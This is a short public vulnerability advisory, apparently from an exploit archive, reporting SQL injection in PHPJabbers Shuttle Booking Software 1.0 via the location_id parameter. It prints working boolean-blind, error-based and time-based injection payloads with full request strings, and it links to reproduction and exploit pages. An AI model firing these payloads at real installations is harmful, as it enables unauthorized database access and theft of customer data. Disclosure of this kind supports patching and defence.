Shuttle Booking Software 1.0 SQL Injection

2023.09.13
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## Title: Shuttle-Booking-Software-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 09/10/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The location_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the location_id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker easily can steal all information from the database of this web application! WARNING! All of you: Be careful what you buy! This will be your responsibility! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: location_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND 1347=1347 AND ('MVss'='MVss&traveling=from Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT (ELT(9416=9416,1))),0x71706b7071),9416) AND ('dOqc'='dOqc&traveling=from Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND ('EEYQ'='EEYQ&traveling=from --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html) ## Time spent: 01:47:00


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top